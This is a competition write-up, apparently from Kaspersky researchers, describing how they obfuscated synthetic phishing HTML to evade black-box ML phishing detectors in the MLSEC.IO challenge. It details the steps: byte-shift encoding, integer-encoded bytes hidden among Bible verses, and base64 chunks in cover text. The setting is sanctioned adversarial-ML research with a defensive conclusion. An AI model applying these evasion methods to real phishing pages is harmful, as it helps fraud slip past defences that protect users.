Skip to content

Instantly share code, notes, and snippets.

Last active Jul 13, 2022
What would you like to do?
MLSEC.IO Phishing Track Solution

MLSEC.IO Phishing Track Solution

About us: Our team comprises two data scientists from the Technology Research team at Kaspersky, who are working on, among other things, Machine Learning (ML) based phishing detection technologies. Here’s how we achieved first place in the phishing track of the Machine Learning Security Evasion Competition, sponsored by Microsoft and partners CUJO AI, NVIDIA, VMRay, and MRG Effitas.

Task description

The task was to modify 10 (synthetic) phishing samples to make seven phishing detection models believe these samples were benign. A model was bypassed if it returned a probability of less than 0.1 for each sample. However, there was a catch: after modifications, the samples needed to look the same as before (or to be precise, screenshots of the renders should have the same hashes for both the original and the modified html file). Models were available via an API, that is the setting was black-box. To win, you needed to fool as many models as possible for each sample, making the least number of API queries.

What we did

At first, we thought of attempting a classic model replication attack (see AML.T0005 of MITRE ATLAS), but as we started working on the competition, we noted that the leader had already achieved the highest possible score using just 343 API calls (with one full upload costing 70 calls). This kind of attack would entail submitting a large number of phishing/non-phishing pages to retrieve outputs of the models and training our own ‘shadow’ models, which we would then attempt to bypass offline. However, we did not have the API query budget for that, which probably made the setting a bit more realistic. We, therefore, had to rely upon domain expertise and chance. We started off by submitting several clean web pages, such as Wikipedia pages to check what probabilities the models returned. But while the first three models were happy with them, the remaining four consistently produced probabilities significantly larger than 0.1. We also learned from the API response speed that the models probably ingested the raw HTML, without any kind of browser rendering.

Littering the page with invisible text

We composed a simple script to check render hashes and tried our first solution – adding a large hidden chunk of a Wikipedia page to a phishing sample, and fixing invalid HTML and applied minification. This worked, but only for the first three models. We questioned if some of the models could be overfitted on the provided samples? In the process, we learned that the last three models, often produced identical scores, so we only tested our samples on the previous model (probably, the most sensitive) to save API calls.

Obfuscation via byte shift

Working on phishing detection, we, like Rutger Hauer in Blade Runner, had seen things. Phishing payloads hidden in Morse code. Phishing pages consisting almost entirely of screenshots in base64. Actual page text encrypted with ROT13. Drawing on this domain knowledge, we devised our first obfuscation scheme:

  1. Create a small fake ‘personal blog’ page.
  2. Take the actual phishing page, shift all the symbols by n and store as a string.
  3. On page load, shift the symbols back and document.write the result back to the page. However, this turned out to be a bad idea – not only did the shifting process create all kinds of escaping issues, the last three models still sounded alarms on our samples. We added popular header tags, such as <meta>, which somehow led to poorer results on the first three models. It felt like the last three models were unhappy about a large number of HTML tags or, probably, the high-entropy payload string.

Obfuscation via byte integer encoding

We then tried another kind of obfuscation. Instead of shifting, we encoded each byte as an integer number and put the numbers into invisible <img> tags. This fooled the first four models, but not the last three ones. However, the results were better. We questioned if the last three models could react strongly to the obfuscator code? They probably wouldn’t like document.write? We submitted an empty page with the obfuscator present and learnt that the probabilities were quite low, from 0.074 on the first 4 models to 0.19 on the remaining three, meaning the phish-y JavaScript was not what the models looked at.

Less tags, more text

We hypothesized that the models somehow took into account character distribution. Considering their probable aversion to HTML tags, we used a big chunk of raw text – an excerpt from the Bible. We added relevant <meta> to the header and hid chunks of numericized bytes among the verses like this:

20:18 And he said, Whether [101 49 99 114 117 119 89 79 108 80 78 90 65 83 83 47 56 122 74 74 57 69 104 108 85 67 105 72 106 108] they be come out for peace, take them alive; 
or whether they [70 50 43 97 107 121 71 68 48 47 104 105 83 86 86 108 107 106 107 48 114 111 49 114 78 83 49 85 118 75] be come out for war, take them alive.

This worked! Nine pages out of 10 bypassed all seven models, while the 03.html sample was rejected as too large (the maximum size was experimentally determined to be 10Mb). Moreover, all the probabilities were the same:

00 01 02 03 04 05 06
0.02 0.02 0.02 0.02 0.084 0.087 0.087

By that time, we still had about 50 API calls.

Back to base (64)

This obfuscation scheme was highly inefficient, each byte at least quadrupled. 03.html was a monster of a page, weighing 4Mb due to a few high-res base64 encoded images. We dug into the source code and noticed that some of them were duplicated, so we carved them out. The page slimmed down to 1.7Mb. Alas, to make the obfuscated page less than 10Mb, we were forced to radically increase numbers-to-text ratio. The last three models sounded alarms, probably because it was suspicious of the unusual character count distribution. However, we learnt that if we changed the separator from a space to \n, the sample bypassed them, and the models did at least some kind of processing line by line. In addition to being inefficient, the pages loaded very slowly. So slow, in fact, that the grading system returned screenshot equality check failure for 03.html with byte-to-integer obfuscation. We were wary of using base64 at first, as it was commonly used in the original samples, but in the last hours of the competition, we decided to give it a try and placed base64 chunks among the cloak text:

1:2 And the earth was without form, and void; and darkness was upon
the face of the deep. And the Spirit of God moved upon the face of the

It worked! The page loading time also decreased sharply, and we were able to finally receive the full score for 03.html with the following model outputs:

00 01 02 03 04 05 06
0.017 0.017 0.017 0.017 0.072 0.076 0.076


This was an exciting competition, and even though we did not employ any adversarial ML techniques per se, we were able to deduce at least in general how the models worked by observing their outputs and craft an obfuscation scheme to fool them. This demonstrates the difficulty of detecting phishing pages, and why existing production systems do not rely on HTML code alone to block them. We want to thank the organizers for the opportunity to participate in this competition, and we hope you enjoyed this write-up.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment